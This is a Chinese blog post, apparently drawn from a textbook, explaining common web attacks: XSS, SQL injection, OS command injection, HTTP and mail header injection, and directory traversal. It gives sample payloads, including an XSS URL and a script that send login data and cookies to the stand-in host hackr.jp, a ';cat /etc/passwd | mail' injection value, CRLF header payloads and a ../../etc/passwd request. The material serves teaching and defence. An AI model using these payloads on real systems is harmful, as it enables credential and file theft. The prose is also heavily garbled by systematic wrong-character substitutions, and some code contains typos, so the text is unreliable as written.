关于前端:web安全总结一

25次阅读

共计 4951 个字符,预计需要花费 13 分钟才能阅读完成。

一、针对 Web 的攻打技术

1.HTTP 不具备必要的平安性能

2. 在客户端即可篡改申请

在 web 利用中,从浏览器那里承受到的 HTTP 申请的全部内容,都能够在客户端自在地变更、篡改。所以 Web 用用可能会承受到与预期数据不雷同的内容。

在 HTTP 申请报文内加载攻打代码,就能发动对 Web 利用的攻打。通过 URL 查问字段或表单、HTTP 首部、Cookie 等路径把攻打代码传入,若这时 Web 利用存在安全漏洞,那外部信息就会受到窃取,或被攻击者拿到权限。

3. 针对 Web 利用的攻打模式

对 Web 利用的攻打模式有两种:

  • 主动攻击
  • 被动攻打

以服务器为指标的主动攻击

主动攻击(active attack)是指攻击者通过间接拜访 Web 利用,把攻打代码传入的攻打模式。因为该模式是间接针对服务器上的资源进行攻打,因而攻击者须要可能拜访到那些资源

主动攻击模式里具备代表性的攻打是 SQL 注入攻打和 OS 命令注入攻打。

以服务器为指标的被动攻打

被动攻打(passive attack)是指利用陷阱策略执行攻打代码的攻打模式。在被动攻打过程中,攻击者不间接对指标 Web 利用拜访发动攻打。

被动攻打通常的攻打模式如下

  1. 攻击者诱使用户触发已设置好的陷阱,而陷阱会启动发送已嵌入攻打代码的 HTTP 申请。
  2. 当用户人不知; 鬼不觉中招之后,用户的浏览器或邮件客户端就会触发这个陷阱。
  3. 中招后的用户浏览器会把含有攻打代码的 HTTP 申请发送给作为攻打指标 Web 利用,运行攻打代码。
  4. 执行完攻打代码,存在安全漏洞的 Web 利用会成为攻击者的跳板,可能导致用户所持有的 Cookie 等个人信息被窃取,登录状态中的用户权限遭歹意滥用等结果。

被动攻打模式中具备代表性的攻打是跨站脚本攻打和跨站点申请伪造

二、因输入本义不齐全引发的安全漏洞

施行 Web 利用的平安对策大抵分为以下两局部。

  • 客户端的验证
  • Web 利用端(服务器端)的验证

    • 输出值验证
    • 输入值验证

1 跨站脚本攻打

跨站脚本攻打(Cross-Site Scripting,XSS)是指通过存在安全漏洞的 Web 网站注册用户的浏览器内存运行非法的 HTML 标签或者 JavaScript 进行的一种攻打。动态创建的 HTML 代码局部可能暗藏这安全漏洞。就这样攻击者编写脚本设下陷阱,用户在本人的浏览器上运行时,就会收到被动攻打。

跨站脚本攻打有可能造成以下影响:

  • 利用虚伪输出表单骗取用户信息
  • 利用脚本窃取用户的 Cookie,被害者在不知情的状况下,帮忙攻击者发送歹意申请
  • 显示伪造的文章或图片
1.1 跨站脚本攻打案例:

在表单输入框中嵌入 <script> 标签

XSS 是攻击者利用事后设置的陷阱触发的被动攻打
例如:
有 url 为:http://example.com/login?id=
充沛熟知此处破绽特点的攻击者,会创立嵌入恶意代码的 URI。并暗藏植入当时筹备好的欺诈邮件中,诱导用户点击该 URL

http://example.com/login?id="<script>var+f=document.getElementById("lgin");f.action="http://hackr.jp/pwget";+f.methend="get";</script><span+s="

浏览器关上该 URI 后,直观没有产生任何变动,但设置的脚本开始偷偷运行,当用户在表单输出用户名、明码后,就会发送到攻击者的网站(http://hackr.jp),导致集体登录信息被窃取。

1.2 对用户 Cookie 的窃取攻打

除了在表单中设下陷阱之外,上面那种歹意结构的脚本同样可能以跨站脚本攻打的形式,窃取到用户的 Cookie 信息。

`<script src=http://hackr.jp/xss.js></script>`

该脚本内指定的 http://hackr/xss.js 文件。即上面这段采纳 JavaScript 编写的代码

var content = escape(document.cookie)
document.write('![](http://harkr.jp/?>)')
document.write(content)
document.write('>')

在存在可跨站脚本攻打安全漏洞的 Web 利用上执行下面代码,即可拜访该 Web 利用所处域名下的 Cookie 信息。而后这些信息会发送至攻击者的 Web 网站(http://hackr.jp/),记录在登录日志中。而后就能够窃取到用户的 Cookie 信息

2 SQL 注入攻打

SQL 注入(SQL Injection)是指针对 Web 利用应用的数据库,通过运行非法的 SQL 而产生的攻打,该安全隐患有可能引发极大的威逼,有时会间接导致个人信息及机密信息的泄露。

Web 利用通常都会用到数据库,当须要对数据库表内的数据进行检索或增加、删除等操作时,会应用 SQL 语句连贯数据库进行特定的操作。如果在调用 SQL 语句的形式上存在疏漏,就有可能执行被歹意注入非法 SQL 语句。

SQL 注入攻打有可能会造成以下等影响。

  • 非法查看或篡改数据库的数据
  • 躲避认证
  • 执行和数据库服务器业务关联的程序等
2.1 SQL 注入攻打案例

如果有一个搜寻 URI 为:http://example.com/search?q=…,则能够在数据库中查找 author 为西红柿的在售书籍信息。

当攻击者把西红柿的查问字段改为 ” 西红柿 ’–‘”

则会查出西红柿的所有数据数据信息(– 之后全视为正文)

2.2 SQL 注攻打毁坏 SQL 数据结构

SQL 注入是攻击者讲 SQL 语句扭转成开发者意想不到的模式以达到毁坏构造的攻打。

比方:在上述案例中,把 author 的字面值 ” 西红柿 ’–‘” 的字符串复制给 $q

SELECT * FROM bookTab WHERE auther = ‘$q’ and flag = 1

SELECT * FROM bookTab WHERE auther = <u>’ 西红柿 </u>’–‘ and flag = 1

能够把所有数据信息,甚至用户信息等重要信息失去或者篡改

3 OS 命令注入攻打

OS 命令注入攻打(OS Command Injection)是指通过 Web 利用,执行非法的零碎操作命令以达到攻打的目标。只有能调用 Shell 函数的中央就有可能被攻打。

OS 命令注入攻打能够向 Shell 发送命令,让 Windows 或 Linux 操作系统的命令启动程序。通过 OS 注入攻打能够执行 OS 上装置着的各种程序。

3.1 OS 注入攻打案例

如,有征询表单,邮件地址,邮件内容。该性能可将用户信息的征询邮件按已填写的对方的邮件地址发送

如果有一下代码

my $adr = $q->param('mailaddress');
open(MALL, "| /usr/sbin/sendmail $adr");
print MALL "From: info@example.com\n"

程序中的 open 函数会调用 sendmail 命令发送邮件,而指定的邮件发送地址即 $adr 的值。

攻击者则会将上面的值作为邮件地址。

;cat /etc/passwd | mail hack@example.com

程序接管该值,形成以下的命令组合。

| /usr/sbin/sedmail; cat /etc/passwd | mail hack@example.com

攻击者命令中的(;)会在 OS 中被合成为多个执行命令的标记。

可见,sendmail 命令被执行分隔后,接下来会执行 cat /etc/passwd | mail hack@example.com。那么还有 Linux 账户信息的文件就会以邮件模式发送到 hack@example.com。

4 HTTP 首部注入攻打

HTTP 首部注入攻打(HTTP Header Injection)是指攻击者通过在响应首部字段内插入换行,增加任意响应首部或者主体的一种攻打。属于被动攻打。

向首部主体内增加内容的攻打称为 HTTP 响应截断攻打(HTTP Response Splitting Attack)

如下,Web 利用会把从内部接管到的数值,赋给响应首部字段的 Location 和 Set-Cookie。

location: http:..www.example.com/a.cgi?q=12345
Set_cookie: UID=123456

其中 12345 为插入值。

HTTP 首部注入攻打可能像这样,通过某些响应首部字段须要解决输入值的中央,插入换行动员攻打。

HTTP 首部注入攻打有可能会造成以下一些影响。

  • 设置任何 Cookie 信息
  • 重定向到任意 URL
  • 显示任意的主体(HTTP 响应截断攻打)
4.1 HTTP 首部注入攻打案例

例如,某网站有分类信息:书籍(id:101)、音乐(id:102)、游戏(id:103)

假如有一个性能,抉择对应的分类。将会依据对应的 ID 反映在响应的 Location 首部字段内。如:Location: http://example.com/?cat=101。使浏览器产生重定向跳转。

那么,攻击者用 101%0D%0ASet-Cookie:+SID=123456789 代替之前对应的 ID 后发送申请。

其中,%0D%0A 代表 HTTP 报文中的换行符,紧接着是可强制将攻击者网站的回话 ID 设置成 SID=123456789 的 Set-Cookie 首部字段。

攻击者能够指定批改任意的 Cookie 信息,通过和会话固定攻打,攻击者伪装成用户。

4.2 HTTP 响应截断攻打

HTTP 响应截断攻打是用在 HTTP 首部注入的一种攻打,攻打程序雷同,然而讲两个 %0D%0A%0D%0A 并排插入字符串后。利用两个分割的换行就能够做出 HTTP 首部与主体分隔所须要的空行,而后就能够插入伪造的主体,打到攻打的目标。

%0D%0A%0D%0A<HTML><HEAD><TITLE> 插入想显示的网页内容 <!--

在可能进行 HTTP 首部注入的环节,通过发送下面的字符串,返回后果失去以下这种响应。

Set-Cookie: UID=(%0D%0A: 换行符)
(%0D%0A: 换行符)
<HTML><HEAD><TITLE> 插入想显示的网页内容 =>
<!-- 元本页面首部字段和主体局部全副视为正文

利用这个攻打,已触发陷阱的用户浏览器就会显示伪造的 Web 页面,再让用户输出本人的个人信息等,可打到跨站脚本攻打雷同的成果。

另外,滥用 HTTP/1.1 中会集多响应返回性能,会导致缓存服务器对任意内容进行缓存操作。这种攻打成为缓存净化。应用该缓存服务器的用户,在浏览器蒙受攻打的网站,会一直地浏览被替换掉的 Web 网页。

5 邮件首部注入攻打

邮件首部注入(Mail Header Injection)是指 Web 利用中的邮件发送性能,攻击者通过邮件首部 To 或者 Subject 内任意增加非法内容发动的攻打。利用存在安全漏洞的 Web 网站,可对任意邮件地址发送广告邮件或病毒邮件。

5.1 邮件首部注入攻打案例

还是以邮件地址、邮件内容的表单为例;

攻击者将一下数据作为邮件地址发动申请。

bob@hackr.com%0D%0ABcc:user@example.com

%0D%0A 在邮件报文中代表换行符。一旦表单所在的 Web 利用承受这个换行符,就可能实现对 Bcc 邮件地址的追加发送,而这本来是无奈指定的。

另外,如下所示,应用两个间断的换行符就有可能篡改邮件文本内容并发送。

bob@hackr.com%0D%0A%0D%0ATest Message

再以雷同的办法,就有可能改写 To 和 Subject 等任意邮件首部,或向文本增加附件等动作。

6 目录遍历攻打

目录遍历(Directory Traversal)攻打是指对本无心公开的文件目录,通过非法截断其目录门路后,达成拜访目标的一种攻打。这种攻打有时也称为门路遍历(Path Traversal)攻打。

通过 Web 利用对文件解决操作时,在由内部指定文件名的解决存在疏漏的状况下,用户应用../ 等相对路径定位到 /etc/passed 等绝对路径上,因而服务器上任意的文件或文件目录都有可能被拜访到。因而,有可能非法浏览、篡改、或者删除服务器上的文件。

6.1 目录遍历攻打案例

例如,有依据文件名获取文件信息:

http://example.com/file?file=0401.log

攻击者设置如下查问字段后申请

http://example.com/file?file=../../etc/passwd

这样,服务器的文件就有可能被拜访。

正文完
 0